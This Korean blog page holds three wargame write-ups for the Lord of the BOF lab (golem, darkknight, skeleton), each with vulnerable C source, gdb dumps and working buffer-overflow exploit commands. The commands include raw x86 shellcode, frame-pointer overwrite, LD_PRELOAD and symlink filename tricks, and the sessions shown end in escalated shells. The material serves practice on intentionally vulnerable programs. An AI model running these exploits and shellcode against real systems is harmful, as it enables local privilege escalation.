'Wargame' 카테고리의 글 목록 (3 Page)

golem -> darkknight

Wargame/LOB (Redhat9) 2014. 2. 20. 15:18

일단 소스를 보면,

[golem@localhost golem]$ cat darkknight.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - darkknight
        - FPO
*/

#include <stdio.h>
#include <stdlib.h>

void problem_child(char *src)
{
        char buffer[40];
        strncpy(buffer, src, 41);
        printf("%s\n", buffer);
}

main(int argc, char *argv[])
{
        if(argc<2){
                printf("argv error\n");
                exit(0);
        }

        problem_child(argv[1]);
}

힌트로 위에 FPO가 나와있는데 "~~stack~~ Frame Pointer Operation"의 약자인 것 같다. (SFPO가 아니네요 ㅋㅋ)

0x8048440 <problem_child>: push %ebp
0x8048441 <problem_child+1>: mov %esp,%ebp

이 부분은 함수 프롤로그 부분인데

예전 함수의 ebp를 백업하는 부분이다.

지금은 main함수 안에서 problem_child라는 함수 안으로 들어와 있는데, 함수가 종료할 때, 이전 함수의 Base Pointer를 찾아가기 위해서이다.

조작된 sfp를 갖고 나와서

leave ret이 진행 되므로

mov %ebp,%esp

pop %ebp

를 수행한다.

즉 ebp를 esp가 가리키는 곳에 넣는다. 그리고 그 ebp를 pop하면서 esp+4가 된다.

따라서 sfp가 가리키는곳의 +4가 main함수의 return address인 것이다.

problem_child함수의 ebp(main함수 관점에서 sfp)+4는 main함수의 return address이다.

따라서 여기서는 strncpy함수로 인해서 sfp의 단 1바이트만을 조작할 수 있다.

(gdb) disas problem_child
Dump of assembler code for function problem_child:
0x8048440 <problem_child>:      push   %ebp
0x8048441 <problem_child+1>:    mov    %esp,%ebp
0x8048443 <problem_child+3>:    sub    $0x28,%esp
0x8048446 <problem_child+6>:    push   $0x29
0x8048448 <problem_child+8>:    mov    0x8(%ebp),%eax
0x804844b <problem_child+11>:   push   %eax
0x804844c <problem_child+12>:   lea    0xffffffd8(%ebp),%eax
0x804844f <problem_child+15>:   push   %eax
0x8048450 <problem_child+16>:   call   0x8048374 <strncpy>
0x8048455 <problem_child+21>:   add    $0xc,%esp
0x8048458 <problem_child+24>:   lea    0xffffffd8(%ebp),%eax
0x804845b <problem_child+27>:   push   %eax
0x804845c <problem_child+28>:   push   $0x8048500
0x8048461 <problem_child+33>:   call   0x8048354 <printf>
0x8048466 <problem_child+38>:   add    $0x8,%esp
0x8048469 <problem_child+41>:   leave
0x804846a <problem_child+42>:   ret
0x804846b <problem_child+43>:   nop
End of assembler dump.
(gdb) Quit
(gdb) b *problem_child+38
Breakpoint 2 at 0x8048466
(gdb) r `perl -e 'print "A"x40'`
Starting program: /home/golem/tmp/darkknight `perl -e 'print "A"x40'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 2, 0x8048466 in problem_child ()
(gdb) x/100x $ebp
0xbffff9ac:     0xbffff900      0x0804849e      0xbffffb2f      0xbffff9d8
0xbffff9bc:     0x400309cb      0x00000002      0xbffffa04      0xbffffa10
0xbffff9cc:     0x40013868      0x00000002      0x08048390      0x00000000
0xbffff9dc:     0x080483b1      0x0804846c      0x00000002      0xbffffa04
0xbffff9ec:     0x080482e4      0x080484dc      0x4000ae60      0xbffff9fc
0xbffff9fc:     0x40013e90      0x00000002      0xbffffb14      0xbffffb2f
0xbffffa0c:     0x00000000      0xbffffb58      0xbffffb7a      0xbffffb84
0xbffffa1c:     0xbffffb92      0xbffffbb1      0xbffffbbf      0xbffffbd8
0xbffffa2c:     0xbffffbf3      0xbffffc12      0xbffffc1d      0xbffffc2b
0xbffffa3c:     0xbffffc6c      0xbffffc7f      0xbffffc90      0xbffffca5
0xbffffa4c:     0xbffffcae      0xbffffcbe      0xbffffcc9      0xbffffdbd
0xbffffa5c:     0xbffffdda      0xbffffde6      0xbffffdf1      0xbffffe02
0xbffffa6c:     0xbffffe16      0xbffffe1e      0x00000000      0x00000003
0xbffffa7c:     0x08048034      0x00000004      0x00000020      0x00000005
0xbffffa8c:     0x00000006      0x00000006      0x00001000      0x00000007
0xbffffa9c:     0x40000000      0x00000008      0x00000000      0x00000009
0xbffffaac:     0x08048390      0x0000000b      0x000001ff      0x0000000c
0xbffffabc:     0x000001ff      0x0000000d      0x000001ff      0x0000000e
0xbffffacc:     0x000001ff      0x00000010      0x0febfbff      0x0000000f
0xbffffadc:     0xbffffb0f      0x00000000      0x00000000      0x00000000
0xbffffaec:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffafc:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffb0c:     0x69000000      0x00363836      0x6d6f682f      0x6f672f65
0xbffffb1c:     0x2f6d656c      0x2f706d74      0x6b726164      0x67696e6b
0xbffffb2c:     0x41007468      0x41414141      0x41414141      0x41414141
(gdb)
0xbffffb3c:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffb4c:     0x41414141      0x41414141      0x00414141      0x5353454c

현재 공격자가 입력한 데이터가 0xbfffb~~ 쯤에 들어가는 것을 볼 수가 있다.

SFP를 1바이트 조작할 수 있으니, 공격자가 입력한 데이터를 가리키는 주소 값들이 위치한 주소로 overwrite하면 된다.

현재 ebp는 0xbffff9~~ 대 이니까, 0xbffff900 ~ 0xbffff9ff 까지 조작 할 수 있다.

(gdb) x/100x $ebp-200
0xbffff8e4:     0x4001ad70      0x400143e0      0x00000003      0x40014650
0xbffff8f4:     0x00000001      0xbffff910      0x08048170      0x400140d4
0xbffff904:     0x078e530f      0xbffff98c      0xbffff944      0x4000a7fd
0xbffff914:     0x400143d0      0x400146b0      0x00000007      0x4000a74e
0xbffff924:     0x401081ec      0x4000ae60      0xbffffa04      0x400143e0
0xbffff934:     0x40021df0      0x401088c0      0x4002982c      0x40021df0
0xbffff944:     0xbffff974      0x4000a970      0xbffffb58      0xbffff9ac
0xbffff954:     0x4005d920      0x400143e0      0xbffff974      0x40066070
0xbffff964:     0x40106980      0x08048500      0xbffff984      0x401081ec
0xbffff974:     0xbffff9ac      0x08048466      0x08048500      0xbffff984
0xbffff984:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff994:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff9a4:     0x41414141      0x41414141      0xbffff900      0x0804849e
0xbffff9b4:     0xbffffb2f      0xbffff9d8      0x400309cb      0x00000002
0xbffff9c4:     0xbffffa04      0xbffffa10      0x40013868      0x00000002
0xbffff9d4:     0x08048390      0x00000000      0x080483b1      0x0804846c
0xbffff9e4:     0x00000002      0xbffffa04      0x080482e4      0x080484dc
0xbffff9f4:     0x4000ae60      0xbffff9fc      0x40013e90      0x00000002
0xbffffa04:     0xbffffb14      0xbffffb2f      0x00000000      0xbffffb58
0xbffffa14:     0xbffffb7a      0xbffffb84      0xbffffb92      0xbffffbb1
0xbffffa24:     0xbffffbbf      0xbffffbd8      0xbffffbf3      0xbffffc12
0xbffffa34:     0xbffffc1d      0xbffffc2b      0xbffffc6c      0xbffffc7f
0xbffffa44:     0xbffffc90      0xbffffca5      0xbffffcae      0xbffffcbe
0xbffffa54:     0xbffffcc9      0xbffffdbd      0xbffffdda      0xbffffde6
0xbffffa64:     0xbffffdf1      0xbffffe02      0xbffffe16      0xbffffe1e
(gdb)

빨간색으로 칠해져 있는 부분이 입력한 데이터 값이다.

저곳에 0x41414141 이런 문자들 말고, 쉘코드를 넣은 환경변수의 주소를 10개정도 넣은 뒤 맨 마지막 한 바이트를 84(여기서는 84)로 overwrite해주면 된다.

[golem@localhost golem]$ ./darkknight `perl -e 'print "\xd1\xfd\xff\xbf"x10,"\xa4"'`
Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿¤uy¿ž-uy¿euy¿E @
bash$ my-pass
euid = 512
new attacker
bash$

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

bugbear -> giant (0)	2014.02.20
darkknight -> bugbear (0)	2014.02.20
skeleton -> golem (0)	2014.02.20
vampire -> skeleton (0)	2014.02.20
troll -> vampire (0)	2014.02.20

Posted by windowhan

,

skeleton -> golem

Wargame/LOB (Redhat9) 2014. 2. 20. 15:17

LD_PRELOAD 를 사용하라는 힌트를 받았다.

LD_PRELOAD는 공유라이브러리의 경로를 지정해주는 환경변수이다.

따라서 이 LD_PRELOAD에 실린 경로는 공유라이브러리 로써 가장 먼저 탑재가 되고, 스택의 하단에 위치한다.

LD_PRELOAD로 인해서 실행시키는 프로그램의 함수를 후킹 할 수 있는데, 여기서는 단순하게 파일명을 스택에 남기는 용으로 사용한다.

[skeleton@localhost tmp]$ vi `perl -e 'print "A"x100,".c"'`

[skeleton@localhost tmp]$ gcc -o `perl -e 'print "A"x100,".so"'` `perl -e 'print "A"x100,".c"'` -fPIC -shared

[skeleton@localhost tmp]$ export LD_PRELOAD=`pwd`/`perl -e 'print "A"x100,".so"'`

0xbffff5c0:     0x00000002      0x40023fd0      0x00000000      0x00000000
0xbffff5d0:     0x40013868      0x40000814      0x400041b0      0x00000001
0xbffff5e0:     0xbffff5ec      0x40001528      0x000002c8      0x00000000
0xbffff5f0:     0x080482d0      0x00000000      0x00000001      0x40000824
0xbffff600:     0xbffff60c      0x400075bb      0x40017000      0x00002fb2
0xbffff610:     0x40013868      0xbffff7c4      0x4000380e      0x40014450
0xbffff620:     0x6d6f682f      0x6b732f65      0x74656c65      0x742f6e6f
0xbffff630:     0x412f706d      0x41414141      0x41414141      0x41414141
0xbffff640:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff650:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff660:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff670:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff680:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff690:     0x41414141      0x2e414141      0x40006f73      0x40013868
0xbffff6a0:     0x4000220c      0xbffffbc7      0x00000000      0x00000000
0xbffff6b0:     0x00000000      0x00000000      0x40014a00      0x00000000
0xbffff6c0:     0x00000000      0x00000000      0x00000000      0x00000006
0xbffff6d0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6e0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6f0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff700:     0x00000000      0x00000001      0x00000000      0x00000001
0xbffff710:     0xbffff61c      0x00060000      0x00000000      0x00000000
0xbffff720:     0x00000000      0x00000001      0x00000000      0x00000000

이렇게 다 밀려도 살아있다.

[skeleton@localhost tmp]$ gcc -o `perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3",".so"'` `perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3",".c"'` -fPIC -shared

[skeleton@localhost tmp]$ vi `perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3",".c"'`

[skeleton@localhost tmp]$ export LD_PRELOAD=`pwd`/`perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3",".so"
> '`

[skeleton@localhost tmp]$ gdb -q ./golem
(gdb) disas main
Dump of assembler code for function main:
0x8048470 <main>:       push   %ebp
0x8048471 <main+1>:     mov    %esp,%ebp
0x8048473 <main+3>:     sub    $0x2c,%esp
0x8048476 <main+6>:     cmpl   $0x1,0x8(%ebp)
0x804847a <main+10>:    jg     0x8048493 <main+35>
0x804847c <main+12>:    push   $0x8048570
0x8048481 <main+17>:    call   0x8048378 <printf>
0x8048486 <main+22>:    add    $0x4,%esp
0x8048489 <main+25>:    push   $0x0
0x804848b <main+27>:    call   0x8048388 <exit>
0x8048490 <main+32>:    add    $0x4,%esp
0x8048493 <main+35>:    mov    0xc(%ebp),%eax
0x8048496 <main+38>:    add    $0x4,%eax
0x8048499 <main+41>:    mov    (%eax),%edx
0x804849b <main+43>:    add    $0x2f,%edx
0x804849e <main+46>:    cmpb   $0xbf,(%edx)
0x80484a1 <main+49>:    je     0x80484c0 <main+80>
0x80484a3 <main+51>:    push   $0x804857c
0x80484a8 <main+56>:    call   0x8048378 <printf>
0x80484ad <main+61>:    add    $0x4,%esp
0x80484b0 <main+64>:    push   $0x0
0x80484b2 <main+66>:    call   0x8048388 <exit>
0x80484b7 <main+71>:    add    $0x4,%esp
0x80484ba <main+74>:    lea    0x0(%esi),%esi
0x80484c0 <main+80>:    mov    0xc(%ebp),%eax
0x80484c3 <main+83>:    add    $0x4,%eax
0x80484c6 <main+86>:    mov    (%eax),%edx
0x80484c8 <main+88>:    push   %edx
0x80484c9 <main+89>:    lea    0xffffffd8(%ebp),%eax
0x80484cc <main+92>:    push   %eax
0x80484cd <main+93>:    call   0x80483a8 <strcpy>
0x80484d2 <main+98>:    add    $0x8,%esp
0x80484d5 <main+101>:   lea    0xffffffd8(%ebp),%eax
0x80484d8 <main+104>:   push   %eax
0x80484d9 <main+105>:   push   $0x8048599
0x80484de <main+110>:   call   0x8048378 <printf>
0x80484e3 <main+115>:   add    $0x8,%esp
0x80484e6 <main+118>:   push   $0x2c
0x80484e8 <main+120>:   push   $0x0
0x80484ea <main+122>:   lea    0xffffffd8(%ebp),%eax
---Type <return> to continue, or q <return> to quit---
0x80484ed <main+125>:   push   %eax
0x80484ee <main+126>:   call   0x8048398 <memset>
0x80484f3 <main+131>:   add    $0xc,%esp
0x80484f6 <main+134>:   lea    0xffffffd8(%ebp),%eax
0x80484f9 <main+137>:   mov    $0xbfffffcf,%edx
0x80484fe <main+142>:   mov    %edx,%ecx
0x8048500 <main+144>:   sub    %eax,%ecx
0x8048502 <main+146>:   mov    %ecx,%eax
0x8048504 <main+148>:   push   %eax
0x8048505 <main+149>:   push   $0x0
0x8048507 <main+151>:   lea    0xffffffd8(%ebp),%eax
0x804850a <main+154>:   lea    0x30(%eax),%edx
0x804850d <main+157>:   push   %edx
0x804850e <main+158>:   call   0x8048398 <memset>
0x8048513 <main+163>:   add    $0xc,%esp
0x8048516 <main+166>:   leave
0x8048517 <main+167>:   ret
0x8048518 <main+168>:   nop
0x8048519 <main+169>:   nop
0x804851a <main+170>:   nop
0x804851b <main+171>:   nop
0x804851c <main+172>:   nop
0x804851d <main+173>:   nop
0x804851e <main+174>:   nop
0x804851f <main+175>:   nop
End of assembler dump.
(gdb)
(gdb) b *main+167
Breakpoint 1 at 0x8048517
(gdb) r `perl -e 'print Quit
(gdb) Quit
(gdb) Quit
(gdb) r `perl -e 'print "\xbf"x48'`
Starting program: /home/skeleton/tmp/./golem `perl -e 'print "\xbf"x48'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿

Breakpoint 1, 0x8048517 in main ()
(gdb) x/1000x 0xbfff000
0xbfff000:      Cannot access memory at address 0xbfff000
(gdb) x/1000x 0xbfffff0
0xbfffff0:      Cannot access memory at address 0xbfffff0
(gdb) x/1000x 0xbffff000
0xbffff000:     0x00000583      0x000006de      0x00000432      0x0000013f
0xbffff010:     0x0000016e      0x000002f1      0x00000000      0x00000420
0xbffff020:     0x000006c0      0x0000052e      0x0000046c      0x00000000
0xbffff030:     0x000004cd      0x00000660      0x00000000      0x000001af
0xbffff040:     0x0000048a      0x4002bb0e      0xbffff118      0x400081e6
0xbffff050:     0x4002bad5      0x4002bad5      0x40013868      0x40014930
0xbffff060:     0x0000598c      0x00000259      0x00000000      0x00000591
0xbffff070:     0x000006ea      0x000006ec      0x0000028f      0x000005bb
0xbffff080:     0x000006ce      0x00005450      0x000003c7      0x000006c2
0xbffff090:     0x00000000      0x0000070b      0x400221c0      0x00000545
0xbffff0a0:     0x40023fd0      0x4001cd70      0x40014930      0x00000004
0xbffff0b0:     0x40014ba0      0x00000002      0xbffff0d0      0x400221c0
0xbffff0c0:     0x40014b34      0x03c40f19      0xbffff14c      0x4002995c
0xbffff0d0:     0x400221c0      0x40014930      0x4002bad5      0x4002bad5
0xbffff0e0:     0x40013868      0x40014930      0x0000590a      0x0000065b
0xbffff0f0:     0x00000561      0x000005cc      0x00000000      0x40001402
0xbffff100:     0xbffff1d0      0x40008134      0x40000c7d      0x40024f23
0xbffff110:     0x40013868      0x40014930      0x00000f53      0x4000a7fd
0xbffff120:     0x40014920      0x40014c58      0x00000007      0x4000a74e
0xbffff130:     0x4010a1ec      0xbffff1d1      0x00000000      0x00000180
0xbffff140:     0x400221c0      0x4010a710      0x00000000      0x400221c0
0xbffff150:     0x40000474      0x00000000      0x40000824      0x400002f4
0xbffff160:     0x40013c00      0x00000004      0x40014ba0      0x00000004
0xbffff170:     0xbffff188      0x4001dd60      0x40014b3c      0x056e90c5
0xbffff180:     0xbffff204      0x40024f23      0x4001dd60      0x40014930
0xbffff190:     0x000000bd      0x4002bb0e      0xbffff268      0x400081e6
0xbffff1a0:     0x4002bad5      0x4002bad5      0x40013868      0x40014930
0xbffff1b0:     0x0000187f      0x00000001      0x4001fe70      0x00000310
0xbffff1c0:     0x40023fd0      0x4001cd70      0x40014930      0x00000004
0xbffff1d0:     0xbffff208      0x4000a7fd      0x40014920      0x40014c58
0xbffff1e0:     0x40001402      0xbffff2b4      0x40008134      0x40000ec9
0xbffff1f0:     0x40025713      0x40013868      0x40014930      0x00001743
0xbffff200:     0x40024f23      0x4001dd60      0xbffff248      0x4000a970
0xbffff210:     0x40017000      0x40108980      0x400c0b00      0x00000000
0xbffff220:     0x40000ec9      0x400707e4      0x00000001      0x00000000
0xbffff230:     0x00000031      0x40000664      0x00000000      0x40000824
0xbffff240:     0x400002f4      0x40013c00      0x00000004      0x40014ba0
0xbffff250:     0x00000004      0xbffff26c      0x4001e4f0      0x40014b3c
0xbffff260:     0x00dc28f5      0xbffff2e8      0x40025713      0x4001e4f0
0xbffff270:     0x40014930      0x40108980      0x40017000      0x00000031
0xbffff280:     0x4010a1ec      0x40108980      0xbffff2a8      0x4006fa3e
---Type <return> to continue, or q <return> to quit---
0xbffff290:     0x40108980      0x40017000      0x00000031      0x4010a1ec
0xbffff2a0:     0x00000001      0x40108980      0xbffff2bc      0x400711c7
0xbffff2b0:     0x40108980      0xbffff2ec      0x4000a7fd      0x40014920
0xbffff2c0:     0x40014c58      0x00000007      0x4000a74e      0x4010a1ec
0xbffff2d0:     0x0804859c      0x00000001      0x40014930      0x4001e4f0
0xbffff2e0:     0x4010a320      0x40025713      0x4001e4f0      0xbffff9a4
0xbffff2f0:     0x4000a970      0x40108980      0x00000400      0x4006c2e4
0xbffff300:     0x40014930      0xbffff9a4      0x4006428b      0x40108980
0xbffff310:     0x4010a1ec      0x4000ae60      0xbffffa44      0x00000000
0xbffff320:     0x0000675b      0x000081a4      0x00000001      0x00000000
0xbffff330:     0x00000000      0x00000808      0x00000000      0x00000000
0xbffff340:     0x00008561      0x000081ed      0x00000001      0x00000000
0xbffff350:     0x40001402      0xbffff424      0x400081e6      0x400013e1
0xbffff360:     0x400013e1      0x40013868      0x400013a5      0x40000824
0xbffff370:     0x400013d3      0x40013c00      0x40014b90      0x0000000e
0xbffff380:     0x40013e80      0x0804859c      0x250014c4      0x00000000
0xbffff390:     0x00000001      0x4002bad5      0x40001353      0x00000000
0xbffff3a0:     0xbffff428      0x40000814      0x00000052      0x40000824
0xbffff3b0:     0x400002f4      0x40013c00      0x00000004      0x40014ba0
0xbffff3c0:     0x00000003      0xbffff3dc      0x40000814      0x400140d4
0xbffff3d0:     0x0b725f23      0xbffff4b8      0x400013a5      0x40000814
0xbffff3e0:     0x40013c00      0x400002f4      0x40013c00      0x00000000
0xbffff3f0:     0x00000000      0x00000004      0x40014ba0      0x00000004
0xbffff400:     0xbffff420      0x40000674      0x400140d8      0x01ee5739
0xbffff410:     0xbffff4b8      0x40000edc      0x40013868      0x40013c00
0xbffff420:     0x00000000      0xbffff4e8      0x4000966a      0x080480f4
0xbffff430:     0x40014cf8      0x00000007      0x40013868      0x00000000
0xbffff440:     0x40013e70      0x40000814      0x40009c50      0x00005207
0xbffff450:     0x4001a0dc      0x4001a0dc      0x4001a0e8      0x00000018
0xbffff460:     0x400017f4      0x00000004      0x4001a0e8      0x40013c00
0xbffff470:     0xbffff4d0      0x2073f4cc      0xffffffff      0xffffffd0
0xbffff480:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff490:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff4a0:     0xbffff9d0      0x00000002      0x40023fd0      0x40013c00
0xbffff4b0:     0x4000ba15      0x00000000      0x00000000      0x00000001
0xbffff4c0:     0xbffff9c8      0xbffff9a3      0x0804859b      0x08048599
0xbffff4d0:     0x00000031      0xffffffff      0x00000000      0x00000001
0xbffff4e0:     0x40000824      0xbffff4f0      0x400075bb      0x40017000
0xbffff4f0:     0x00002fb2      0x40013868      0xbffff734      0x4000380e
0xbffff500:     0x400144d8      0x6d6f682f      0x6b732f65      0x74656c65
0xbffff510:     0x742f6e6f      0x902f706d      0x90909090      0x90909090
---Type <return> to continue, or q <return> to quit---
0xbffff520:     0x90909090      0x0804859c      0x90909090      0x90909090
0xbffff530:     0x90909090      0x90909090      0x00000000      0x00000000
0xbffff540:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff550:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff560:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff570:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff580:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff590:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff5a0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff5b0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff5c0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff5d0:     0x90909090      0x90909090      0x90909090      0x68909090
0xbffff5e0:     0x81cee28a      0x530cb168      0x6f6a6854      0x0168e48a
0xbffff5f0:     0x68633069      0x69743069      0xfe59146a      0x79490c0c
0xbffff600:     0xe1f741fa      0x732ec354      0x4000006f      0x40013868
0xbffff610:     0x4000220c      0xbffffb3c      0x00000000      0x00000000
0xbffff620:     0x00000000      0x00000000      0x40014b00      0x00000000
0xbffff630:     0x00000000      0x00000000      0x00000000      0x00000006
0xbffff640:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff650:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff660:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff670:     0x00000000      0x00000001      0x00000000      0x00000001
0xbffff680:     0xbffff500      0x00060000      0x00000000      0x00000000
0xbffff690:     0x00000000      0x00000001      0x00000000      0x00000000
0xbffff6a0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6b0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6c0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6d0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6e0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6f0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff700:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff710:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff720:     0x00000000      0x00000000      0x4000f7cb      0x4000f7cb
0xbffff730:     0x40013868      0xbffff778      0x4000c84c      0x08048034
0xbffff740:     0x00000006      0xbffff774      0x40013868      0xbffff9a8
0xbffff750:     0x40013da0      0x0001fbf1      0xbffffa50      0x000001fe
0xbffff760:     0x000001fe      0x000001fe      0x000001fe      0x00000006
0xbffff770:     0x08048034      0x080483c0      0xbffff79c      0x40002179
0xbffff780:     0xbffffa40      0x4000220c      0x080483c0      0x40013868
0xbffff790:     0x00000000      0xbffff7f8      0xbffff788      0xbffffa34
0xbffff7a0:     0x400020ea      0xbffffa40      0xbffff808      0x00000000
---Type <return> to continue, or q <return> to quit---q
Quit

[skeleton@localhost skeleton]$ ./golem `perl -e 'print "\xbf"x44,"\x70\xf5\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿poy¿
bash$ id
uid=510(skeleton) gid=510(skeleton) euid=511(golem) egid=511(golem) groups=510(skeleton)
bash$ my-pass
euid = 511
cup of coffee
bash$

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

darkknight -> bugbear (0)	2014.02.20
golem -> darkknight (0)	2014.02.20
vampire -> skeleton (0)	2014.02.20
troll -> vampire (0)	2014.02.20
orge -> troll (0)	2014.02.20

Posted by windowhan

,

vampire -> skeleton

Wargame/LOB (Redhat9) 2014. 2. 20. 15:16

[vampire@localhost vampire]$ cat skeleton.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - skeleton
        - argv hunter
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
        char buffer[40];
        int i, saved_argc;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // egghunter
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // check the length of argument
        if(strlen(argv[1]) > 48){
                printf("argument is too long!\n");
                exit(0);
        }

        // argc saver
        saved_argc = argc;

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);

        // ultra argv hunter!
        for(i=0; i<saved_argc; i++)
                memset(argv[i], 0, strlen(argv[i]));
}

풀다가 당황했다...

argv랑 envp랑 다 밀어버리는데 어떻게...

성우형이 알려줫는데 envp 뒤에는 파일명이 자리잡고 있다고 한다.

이것을 이용해서 BOF 하면 될듯.

0xbfffffde:      ""
0xbfffffdf:      ""
0xbfffffe0:      ""
0xbfffffe1:      ""
0xbfffffe2:      ""
0xbfffffe3:      ""
0xbfffffe4:      ""
0xbfffffe5:      ""
0xbfffffe6:      "/home/vampire/tmp/vul"
0xbffffffc:      ""
0xbffffffd:      ""
0xbffffffe:      ""
0xbfffffff:      ""

심볼릭 링크를 이용하면 될듯하다.

0xbfffffe6:      ""
0xbfffffe7:      "/home/vampire/tmp/sa"
0xbffffffc:      ""

(gdb) x/100x 0xbfffffe7
0xbfffffe7:     0x6d6f682f      0x61762f65      0x7269706d      0x6d742f65
0xbffffff7:     0x61732f70      0x00000000      Cannot access memory at address 0xbfffffff
(gdb) x/s 0xbfffffe7
0xbfffffe7:      "/home/vampire/tmp/sa"
(gdb)

0xbffffb45:0xbffffef8:

./`perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` $(perl -e 'print "\x90"x44,"\x45\xfb\xff\xbf"')

0xbfffff48

./`perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44,"\x38\xff\xff\xbf"'`

(gdb) x/100x 0xbffffa48
0xbffffa48:     0x6d6f682f      0x61762f65      0x7269706d      0x6d742f65
0xbffffa58:     0x2f2e2f70      0x90909090      0x90909090      0x90909090
0xbffffa68:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffa78:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffa88:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffa98:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffaa8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffab8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffac8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffad8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffae8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffaf8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb08:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb18:     0x90909090      0x90909090      0x90909090      0xcee28a68
0xbffffb28:     0x0cb16881      0x6a685453      0x68e48a6f      0x63306901
0xbffffb38:     0x74306968      0x59146a69      0x490c0cfe      0xf741fa79
0xbffffb48:     0x00c354e1      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffb58:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffb68:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffb78:     0xbfbfbfbf      0x00000000      0x00000000      0x00000000
0xbffffb88:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffb98:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffba8:     0x00000000      0x00000000      0x00000000      0x00000000
